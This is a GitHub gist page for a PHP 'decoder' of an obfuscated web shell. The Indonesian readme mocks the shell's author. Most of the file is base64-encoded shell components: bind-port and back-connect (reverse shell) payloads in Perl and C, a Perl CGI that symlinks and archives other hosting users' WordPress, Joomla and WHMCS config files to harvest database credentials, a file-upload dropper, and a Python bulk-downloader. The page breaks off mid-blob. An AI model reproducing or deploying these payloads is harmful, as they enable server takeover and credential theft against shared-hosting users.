Skip to content

Instantly share code, notes, and snippets.

@widnyana

widnyana/decoder.php

Created June 27, 2014 14:03
Show Gist options
  • Save widnyana/8782c3ec8bf39ec8e7ea to your computer and use it in GitHub Desktop.
Save widnyana/8782c3ec8bf39ec8e7ea to your computer and use it in GitHub Desktop.
Download ZIP
cycberbaghos shell, DECODED :p
Raw
readme.md

decoded

gw ga peduli kalo yang punya ini shell marah or ngamuk-ngamuk.

silakan dilihat file decoder.php untuk melihat bagaimana cara mendecodenya.

oh iya, ngedecode ini gampang kok, soalnya si pembuat shell berbaik hati menaruh fungsi untuk decode di dalam body shell yang dia encode

ya sepertinya dia cukup percaya diri

shoutz: dru, rndc, you :)

Raw
decoder.php
<?php
/*
* decoder for some lame obfuscated php shell.
*
* you mad bro?
*
*/
$satu = "bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
$configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7';
$back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
$cp = "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0